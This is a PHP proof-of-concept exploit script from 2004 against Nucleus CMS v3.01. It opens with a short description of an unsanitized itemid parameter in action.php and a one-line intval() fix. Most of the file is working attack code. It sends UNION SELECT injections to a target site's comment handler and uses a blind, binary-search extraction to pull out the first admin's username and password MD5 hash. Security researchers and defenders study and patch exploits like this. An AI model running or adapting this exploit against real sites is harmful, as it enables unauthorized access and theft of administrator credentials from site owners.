nucleusCMSSQL.txt

`#!/usr/bin/php  
  
<?  
  
  
// Nucleus CMS v3.01 addcoment/itemid SQL Injection Proof of Concept  
// By aCiDBiTS [email protected] 24-July-2004  
//  
// Nucleus CMS (http://nucleuscms.org) is a weblog php+mysql application.  
//  
// This Proof of Concept dumps the username and MD5(password) of the admin  
user placed at first position  
// of members table. First of all checks if we can use "union select" or it  
isn't patched and then if first   
// member is admin.  
//  
// Usage (in my debian box):  
// php4 -q nuc_addc_poc.php URL  
  
  
// Vulnerability description  
//   
// In action.php, function addcoment, there's no user input sanization for  
parameter itemid. In line 65:  
// $blogid = getBlogIDFromItemID($post['itemid']);  
// This allows to inject SQL to get data form the database.  
//  
// Solution  
//  
// Modify line 65 with:  
// $blogid = getBlogIDFromItemID(intval($post['itemid']));   
  
  
  
  
echo  
"+-------------------------------------------------------------------+\n|  
Nucleus CMS v3.01 addcoment/itemid SQL Injection Proof of Concept |\n| By  
aCiDBiTS [email protected] 24-July-2004  
|\n+-------------------------------------------------------------------+\n\n  
";  
  
if($argc<2) die("Usage: ".$argv[0]." URL\n\n");  
$host=$argv[1];  
if(substr($host,strlen($host)-1,1)!='/') $host.='/';  
  
echo "Checking if vulnerable and \"union select\" works ... ";  
if( test_cond("1") && !test_cond("0") ) echo "OK!\n";  
else die( "It doesn't :-(\n\n" );  
  
echo "Checking if first member of table is admin ... ";  
if( test_cond("1") ) echo "OK!\n";  
else die( "It's not :-(\n\n" );  
  
echo "\nGetting username: ";  
get_field("mname");  
echo "\nGetting MD5(password): ";  
get_field("mpassword");  
  
die("\n\nDone!\n\n");  
  
  
function get_field( $field )  
{  
$unval= "  
0123456789ABCDEFGHIJKLMNOPRSTUVWXYZabcdefghijklmnopqrstuvwxyz";  
$idx=1;  
$min=0;  
$max=strlen($unval);  
while($min!=$max) {  
$mid=$min+(($max-$min)/2);  
if(  
test_cond("ord(substring($field,$idx,1))=".ord(substr($unval,$mid,1))) ) {  
$idx++;   
echo substr($unval,$mid,1);  
$min=0;  
$max=strlen($unval);  
if( !test_cond("ord(substring($field,$idx,1))") )  
return;  
} else {  
if(  
test_cond("ord(substring($field,$idx,1))<".ord(substr($unval,$mid,1))) )  
$max=$mid;  
else $min=$mid;  
}  
}  
die( "\n\nUnexpected error!\n\n");  
}  
  
  
function test_cond( $cond )  
{  
  
$res=send_post("action=addcomment&url=index.php%3Fitemid%3D1&itemid=1+and+0+  
union+select+1+from+nucleus_member+where+madmin+and+mnumber=1+and+".urlencod  
e($cond)."&body=a&user=a&userid=");  
if( eregi( "nucleus_ban", $res ) )  
return 0;  
else return 1;  
}  
  
function send_post($data)  
{  
global $host;  
$ch=curl_init();   
curl_setopt ($ch, CURLOPT_URL, $host."action.php" );  
curl_setopt ($ch, CURLOPT_HEADER, 0);  
curl_setopt ($ch, CURLOPT_RETURNTRANSFER,1);  
curl_setopt ($ch, CURLOPT_POST, 1);  
curl_setopt ($ch, CURLOPT_POSTFIELDS, $data );  
$data=curl_exec ($ch);  
curl_close ($ch);  
  
return $data;  
}  
  
?>  
`